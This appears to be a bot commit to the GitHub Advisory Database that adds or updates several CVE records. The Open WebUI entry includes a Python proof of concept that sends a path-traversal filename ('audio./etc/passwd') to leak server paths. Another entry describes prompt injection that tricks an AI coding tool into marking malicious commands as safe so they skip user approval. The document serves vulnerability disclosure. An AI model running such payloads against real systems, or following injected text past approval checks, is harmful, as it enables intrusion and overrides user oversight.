Advisory Database Sync

Author: advisory-database[bot]

advisories/github-reviewed/2026/03/GHSA-vvxm-vxmr-624h/GHSA-vvxm-vxmr-624h.json

@@ -0,0 +1,66 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-vvxm-vxmr-624h",
+  "modified": "2026-03-27T15:29:32Z",
+  "published": "2026-03-27T15:29:32Z",
+  "aliases": [
+    "CVE-2026-28786"
+  ],
+  "summary": "Open WebUI vulnerable to Path Traversal in `POST /api/v1/audio/transcriptions`",
+  "details": "### Summary\n\nAn unsanitised filename field in the speech-to-text transcription endpoint allows any authenticated non-admin user to trigger a `FileNotFoundError` whose message — including the server's absolute `DATA_DIR` path — is returned verbatim in the HTTP 400 response body, confirming information disclosure on all default deployments.\n\n### Details\n\n`backend/open_webui/routers/audio.py:1197` extracts a file extension from the raw multipart `filename` using `file.filename.split(\".\")[-1]` with no path sanitisation. The result is concatenated into a filesystem path and passed to `open()`:\n\n```python\next       = file.filename.split(\".\")[-1]       # attacker-controlled, no sanitisation\nfilename  = f\"{id}.{ext}\"                      # may contain \"/\"\nfile_path = f\"{file_dir}/{filename}\"\nwith open(file_path, \"wb\") as f:\n    f.write(contents)\n```\n\nIf the filename is `audio./etc/passwd`, `split(\".\")[-1]` yields `/etc/passwd` and the assembled path becomes:\n\n```\n{CACHE_DIR}/audio/transcriptions/{uuid}./etc/passwd\n```\n\n`open()` fails with `FileNotFoundError`. The outer `except` block at line 1231 returns the exception via `ERROR_MESSAGES.DEFAULT(e)`, leaking the full absolute path in the response body.\n\nThe MIME-type guard at line 1190 checks `Content-Type` (a separate multipart field) and does not constrain `filename`. Setting `Content-Type: audio/wav` satisfies the guard regardless of the filename value.\n\nThis handler is the only file upload path in the codebase that omits `os.path.basename()`. Both sibling handlers apply it explicitly:\n\n```python\n# files.py:244\nfilename = os.path.basename(file.filename)\n\n# pipelines.py:206\nfilename = os.path.basename(file.filename)\n```\n\n**Recommended fix** — match the existing pattern and suppress path leakage in errors:\n\n```python\n# audio.py:1197 — sanitise extension\nfrom pathlib import Path\nsafe_name = Path(file.filename).name\next = Path(safe_name).suffix.lstrip(\".\") or \"bin\"\n\n# audio.py:1231 — suppress internal path in error response\nexcept Exception as e:\n    log.exception(e)\n    raise HTTPException(status_code=400, detail=\"Transcription failed.\")\n```\n\n---\n\n### PoC\n\n**Requirements:** a running Open WebUI instance and one standard (non-admin) user account.\n\n```bash\ndocker run -d -p 3000:8080 --name owui-test ghcr.io/open-webui/open-webui:latest\n# wait ~30 s, register a standard user at http://localhost:3000\npip install requests\n```\n\n```python\nimport requests, sys\n\nBASE_URL = \"http://localhost:3000\"\nEMAIL    = \"user@example.com\"\nPASSWORD = \"changeme\"\n\ntoken = requests.post(f\"{BASE_URL}/api/v1/auths/signin\",\n                      json={\"email\": EMAIL, \"password\": PASSWORD},\n                      timeout=10).json()[\"token\"]\n\nboundary = \"----Boundary\"\nwav_stub = b\"RIFF\\x00\\x00\\x00\\x00WAVE\"\nbody = (\n    f'--{boundary}\\r\\nContent-Disposition: form-data; name=\"file\"; '\n    f'filename=\"audio./etc/passwd\"\\r\\nContent-Type: audio/wav\\r\\n\\r\\n'\n).encode() + wav_stub + f\"\\r\\n--{boundary}--\\r\\n\".encode()\n\nresp = requests.post(\n    f\"{BASE_URL}/api/v1/audio/transcriptions\",\n    data=body,\n    headers={\"Authorization\": f\"Bearer {token}\",\n             \"Content-Type\": f\"multipart/form-data; boundary={boundary}\"},\n    timeout=15,\n)\nprint(resp.status_code, resp.text)\n```\n\n**Observed output (live test, commit `b8112d72b`):**\n\n```\n400 {\"detail\":\"[ERROR: [Errno 2] No such file or directory:\n'/app/backend/data/cache/audio/transcriptions/59457ccf-…./etc/passwd']\"}\n```\n\nThe absolute `DATA_DIR` path is confirmed. Filesystem structure can be enumerated by varying traversal depth and observing which error messages change.\n\n**Note on the write primitive:** the traversal path includes a fresh UUID segment (`{uuid}.`) that never pre-exists as a directory, so `open()` is OS-blocked in all practical scenarios. The impact is information disclosure only.\n\n---\n\n### Impact\nAny authenticated, non-admin user on a default Open WebUI deployment can leak the server's absolute `DATA_DIR` filesystem path. The route is gated by `get_verified_user` — the lowest privilege tier — so every registered account is a potential attacker. Multi-tenant and shared deployments are most exposed.\n\n> **AI Disclosure:** Claude was used to draft this report and the PoC. The vulnerability was identified via manual static analysis of commit `b8112d72b`. All code references were verified by the reporter, who accepts full responsibility for accuracy.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "PyPI",
+        "name": "open-webui"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "0.8.6"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-vvxm-vxmr-624h"
+    },
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28786"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/open-webui/open-webui/commit/387225eb8b3906909436004f84fff1b012e067d4"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/open-webui/open-webui"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-209",
+      "CWE-22"
+    ],
+    "severity": "MODERATE",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-27T15:29:32Z",
+    "nvd_published_at": "2026-03-27T00:16:22Z"
+  }
+}

advisories/unreviewed/2026/03/GHSA-2gfm-7p2p-mfr9/GHSA-2gfm-7p2p-mfr9.json

@@ -1,13 +1,18 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-2gfm-7p2p-mfr9",
-  "modified": "2026-03-25T18:31:52Z",
+  "modified": "2026-03-27T15:30:25Z",
   "published": "2026-03-25T18:31:52Z",
   "aliases": [
     "CVE-2026-25413"
   ],
   "details": "Unrestricted Upload of File with Dangerous Type vulnerability in iqonicdesign WPBookit Pro wpbookit-pro allows Using Malicious Files.This issue affects WPBookit Pro: from n/a through <= 1.6.18.",
-  "severity": [],
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
+    }
+  ],
   "affected": [],
   "references": [
     {
@@ -23,7 +28,7 @@
     "cwe_ids": [
       "CWE-434"
     ],
-    "severity": null,
+    "severity": "CRITICAL",
     "github_reviewed": false,
     "github_reviewed_at": null,
     "nvd_published_at": "2026-03-25T17:16:50Z"

advisories/unreviewed/2026/03/GHSA-36m7-49vh-x3qh/GHSA-36m7-49vh-x3qh.json

@@ -0,0 +1,44 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-36m7-49vh-x3qh",
+  "modified": "2026-03-27T15:30:26Z",
+  "published": "2026-03-27T15:30:25Z",
+  "aliases": [
+    "CVE-2026-32859"
+  ],
+  "details": "ByteDance Deer-Flow versions prior to commit 5dbb362 contain a stored cross-site scripting vulnerability in the artifacts API that allows attackers to execute arbitrary scripts by uploading malicious HTML or script content as artifacts. Attackers can store malicious content that executes in the browser context when users view artifacts, leading to session compromise, credential theft, and arbitrary script execution.",
+  "severity": [
+    {
+      "type": "CVSS_V4",
+      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+    }
+  ],
+  "affected": [],
+  "references": [
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32859"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/bytedance/deer-flow/pull/1389"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/bytedance/deer-flow/commit/5dbb3623b2f0e490c8bb3cd81b1e3b1b12eae1a6"
+    },
+    {
+      "type": "WEB",
+      "url": "https://www.vulncheck.com/advisories/bytedance-deerflow-stored-xss-via-inline-artifact-rendering"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-79"
+    ],
+    "severity": "MODERATE",
+    "github_reviewed": false,
+    "github_reviewed_at": null,
+    "nvd_published_at": "2026-03-27T14:16:08Z"
+  }
+}

advisories/unreviewed/2026/03/GHSA-3q27-7qjq-p9c5/GHSA-3q27-7qjq-p9c5.json

@@ -0,0 +1,34 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-3q27-7qjq-p9c5",
+  "modified": "2026-03-27T15:30:25Z",
+  "published": "2026-03-27T15:30:25Z",
+  "aliases": [
+    "CVE-2026-27877"
+  ],
+  "details": "When using public dashboards and direct data-sources, all direct data-sources' passwords are exposed despite not being used in dashboards.\n\nNo passwords of proxied data-sources are exposed. We encourage all direct data-sources to be converted to proxied data-sources as far as possible to improve your deployments' security.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
+    }
+  ],
+  "affected": [],
+  "references": [
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27877"
+    },
+    {
+      "type": "WEB",
+      "url": "https://grafana.com/security/security-advisories/cve-2026-27877"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [],
+    "severity": "MODERATE",
+    "github_reviewed": false,
+    "github_reviewed_at": null,
+    "nvd_published_at": "2026-03-27T15:16:51Z"
+  }
+}

advisories/unreviewed/2026/03/GHSA-3vj9-9x9c-pmm5/GHSA-3vj9-9x9c-pmm5.json

@@ -0,0 +1,33 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-3vj9-9x9c-pmm5",
+  "modified": "2026-03-27T15:30:26Z",
+  "published": "2026-03-27T15:30:26Z",
+  "aliases": [
+    "CVE-2026-30304"
+  ],
+  "details": "In its design for automatic terminal command execution, AI Code offers two options: Execute safe commands and execute all commands. The description for the former states that commands determined by the model to be safe will be automatically executed, whereas if the model judges a command to be potentially destructive, it still requires user approval. However, this design is highly susceptible to prompt injection attacks. An attacker can employ a generic template to wrap any malicious command and mislead the model into misclassifying it as a 'safe' command, thereby bypassing the user approval requirement and resulting in arbitrary command execution.",
+  "severity": [],
+  "affected": [],
+  "references": [
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30304"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/Secsys-FDU/LLM-Tool-Calling-CVEs/issues/2"
+    },
+    {
+      "type": "WEB",
+      "url": "https://marketplace.visualstudio.com/items?itemName=tianguaduizhang.claude-dev-china"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [],
+    "severity": null,
+    "github_reviewed": false,
+    "github_reviewed_at": null,
+    "nvd_published_at": "2026-03-27T15:16:53Z"
+  }
+}

advisories/unreviewed/2026/03/GHSA-3xj3-c6fm-38wm/GHSA-3xj3-c6fm-38wm.json

@@ -1,13 +1,18 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-3xj3-c6fm-38wm",
-  "modified": "2026-03-25T18:31:51Z",
+  "modified": "2026-03-27T15:30:25Z",
   "published": "2026-03-25T18:31:50Z",
   "aliases": [
     "CVE-2026-25334"
   ],
   "details": "Incorrect Privilege Assignment vulnerability in wordpresschef Salon Booking System Pro salon-booking-plugin-pro allows Privilege Escalation.This issue affects Salon Booking System Pro: from n/a through < 10.30.12.",
-  "severity": [],
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
+    }
+  ],
   "affected": [],
   "references": [
     {
@@ -23,7 +28,7 @@
     "cwe_ids": [
       "CWE-266"
     ],
-    "severity": null,
+    "severity": "HIGH",
     "github_reviewed": false,
     "github_reviewed_at": null,
     "nvd_published_at": "2026-03-25T17:16:44Z"

advisories/unreviewed/2026/03/GHSA-4368-7mjc-5763/GHSA-4368-7mjc-5763.json

@@ -0,0 +1,34 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-4368-7mjc-5763",
+  "modified": "2026-03-27T15:30:25Z",
+  "published": "2026-03-27T15:30:25Z",
+  "aliases": [
+    "CVE-2026-27879"
+  ],
+  "details": "A resample query can be used to trigger out-of-memory crashes in Grafana.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
+    }
+  ],
+  "affected": [],
+  "references": [
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27879"
+    },
+    {
+      "type": "WEB",
+      "url": "https://grafana.com/security/security-advisories/cve-2026-27879"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [],
+    "severity": "MODERATE",
+    "github_reviewed": false,
+    "github_reviewed_at": null,
+    "nvd_published_at": "2026-03-27T15:16:51Z"
+  }
+}

advisories/unreviewed/2026/03/GHSA-45mp-59qj-3qxp/GHSA-45mp-59qj-3qxp.json

@@ -0,0 +1,52 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-45mp-59qj-3qxp",
+  "modified": "2026-03-27T15:30:26Z",
+  "published": "2026-03-27T15:30:26Z",
+  "aliases": [
+    "CVE-2026-4956"
+  ],
+  "details": "A vulnerability was detected in Shenzhen Ruiming Technology Streamax Crocus 1.3.44. The affected element is an unknown function of the file /DevicePrint.do?Action=ReadTask of the component Parameter Handler. The manipulation of the argument State results in sql injection. The attack can be launched remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
+    },
+    {
+      "type": "CVSS_V4",
+      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+    }
+  ],
+  "affected": [],
+  "references": [
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4956"
+    },
+    {
+      "type": "WEB",
+      "url": "https://my.feishu.cn/docx/J8fHdY906o98pax4oCacWLTKndP?from=from_copylink"
+    },
+    {
+      "type": "WEB",
+      "url": "https://vuldb.com/?ctiid.353833"
+    },
+    {
+      "type": "WEB",
+      "url": "https://vuldb.com/?id.353833"
+    },
+    {
+      "type": "WEB",
+      "url": "https://vuldb.com/?submit.777534"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-74"
+    ],
+    "severity": "MODERATE",
+    "github_reviewed": false,
+    "github_reviewed_at": null,
+    "nvd_published_at": "2026-03-27T15:17:03Z"
+  }
+}

advisories/unreviewed/2026/03/GHSA-49jc-jpfq-h27g/GHSA-49jc-jpfq-h27g.json

@@ -0,0 +1,29 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-49jc-jpfq-h27g",
+  "modified": "2026-03-27T15:30:25Z",
+  "published": "2026-03-27T15:30:25Z",
+  "aliases": [
+    "CVE-2025-69986"
+  ],
+  "details": "A buffer overflow vulnerability exists in the ONVIF GetStreamUri function of LSC Indoor Camera V7.6.32. The application fails to validate the length of the Protocol parameter inside the Transport element. By sending a specially crafted SOAP request containing an oversized protocol string, an attacker can overflow the stack buffer, overwriting the return instruction pointer (RIP). This vulnerability allows for Denial of Service (DoS) via device crash or Remote Code Execution (RCE) in the context of the ONVIF service.",
+  "severity": [],
+  "affected": [],
+  "references": [
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69986"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/victorGoeman/LSC-Indoor-Camera-Security-Research/blob/main/CVE-2025-69986.md"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [],
+    "severity": null,
+    "github_reviewed": false,
+    "github_reviewed_at": null,
+    "nvd_published_at": "2026-03-27T15:16:45Z"
+  }
+}

advisories/unreviewed/2026/03/GHSA-5mpf-9qfh-9g4r/GHSA-5mpf-9qfh-9g4r.json

@@ -1,13 +1,18 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-5mpf-9qfh-9g4r",
-  "modified": "2026-03-25T18:31:51Z",
+  "modified": "2026-03-27T15:30:25Z",
   "published": "2026-03-25T18:31:51Z",
   "aliases": [
     "CVE-2026-25345"
   ],
   "details": "Improper Validation of Specified Quantity in Input vulnerability in GalleryCreator SimpLy Gallery simply-gallery-block allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects SimpLy Gallery: from n/a through <= 3.3.2.",
-  "severity": [],
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
+    }
+  ],
   "affected": [],
   "references": [
     {
@@ -23,7 +28,7 @@
     "cwe_ids": [
       "CWE-1284"
     ],
-    "severity": null,
+    "severity": "CRITICAL",
     "github_reviewed": false,
     "github_reviewed_at": null,
     "nvd_published_at": "2026-03-25T17:16:45Z"